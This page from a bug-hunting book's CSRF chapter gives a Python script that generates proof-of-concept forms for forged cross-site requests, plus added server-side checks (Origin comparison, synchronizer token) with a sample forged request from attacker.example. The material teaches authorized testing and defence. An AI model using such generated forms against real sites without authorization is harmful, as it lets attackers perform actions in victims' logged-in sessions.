Page 126 - Hands-On Bug Hunting for Penetration Testers

CSRF and Insecure Session Authentication                                    Chapter 6

Peasoup: the ugliest and most cursed of colors. But more importantly for us, the success message shows our PoC has proved what it set out to do. After we do one more refactoring pass (putting the command-line argument parsing in the `if __name__ == '__main__':` bootstrapping conditional, where it belongs) and adding a PEP8-compatible function docstring, this is what our `csrf_poc_generator.py` looks like:
    #!/usr/bin/env python
    import sys
    import ast

    from bs4 import BeautifulSoup, Tag


    def generate_poc(method, encoding_type, action, fields):
        """Generate a CSRF PoC using basic form data."""
        content = BeautifulSoup('<html></html>', 'html.parser')
        html_tag = content.find('html')
        # The form targets the vulnerable endpoint with the same method and
        # encoding the legitimate request uses
        form_tag = content.new_tag('form', action=action, method=method,
                                   enctype=encoding_type)
        html_tag.append(form_tag)
        for field in fields:
            label_tag = content.new_tag('label')
            label_tag.string = field['label']
            field_tag = content.new_tag('input', type=field['type'],
                                        value=field['value'])
            # 'name' is a positional parameter of new_tag(), so set it as an attribute
            field_tag['name'] = field['name']
            form_tag.append(label_tag)
            form_tag.append(field_tag)
        submit_tag = content.new_tag('input', type='submit', value=action)
        form_tag.append(submit_tag)

        return content.prettify()


    if __name__ == '__main__':
        method = sys.argv[1]
        encoding_type = sys.argv[2]
        action = sys.argv[3]
        # fields arrives as a Python literal (a list of dicts); literal_eval
        # parses it without executing code, unlike eval()
        fields = ast.literal_eval(sys.argv[4])
        print(generate_poc(method, encoding_type, action, fields))

With our script all cleaned up and the vulnerability successfully proven, now we can write our report.
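The defensive counterpart, as an added example that is not part of the book's script: the server-side checks (an Origin/Referer comparison against the site's own origin plus a per-session synchronizer token compared in constant time) that make an auto-submitting form like the one the generator builds fail. The site origin, header and field names, and the two sample requests are constructed assumptions.

```python
import hmac
import secrets
from typing import Mapping, Optional
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example"  # assumed origin of the protected application


def issue_csrf_token() -> str:
    """Per-session synchronizer token: store it server-side, embed it in each form."""
    return secrets.token_urlsafe(32)


def origin_allowed(headers: Mapping[str, str], site_origin: str = SITE_ORIGIN) -> bool:
    """A state-changing request must carry an Origin (or Referer) equal to our own site."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False  # fail closed: no provenance header on a state change
    parts = urlsplit(origin)
    return f"{parts.scheme}://{parts.netloc}" == site_origin


def token_valid(form: Mapping[str, str], session_token: Optional[str]) -> bool:
    """Compare the submitted token with the session copy without a timing side channel."""
    submitted = form.get("csrf_token")
    if not submitted or not session_token:
        return False
    return hmac.compare_digest(submitted, session_token)


def is_csrf_protected(headers: Mapping[str, str], form: Mapping[str, str],
                      session_token: Optional[str]) -> bool:
    """Both checks must pass; either one alone defeats the generated PoC form."""
    return origin_allowed(headers) and token_valid(form, session_token)


# Constructed samples. FORGED is what the PoC form submits when a logged-in
# victim's browser auto-posts it from an attacker-controlled page: the session
# cookie rides along, but the Origin is foreign and no token is present.
TOKEN = "constructed-session-token"
FORGED = {"headers": {"Origin": "https://attacker.example", "Cookie": "session=abc"},
          "form": {"color": "peasoup"}}
LEGIT = {"headers": {"Origin": "https://app.example", "Cookie": "session=abc"},
         "form": {"color": "peasoup", "csrf_token": TOKEN}}
```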
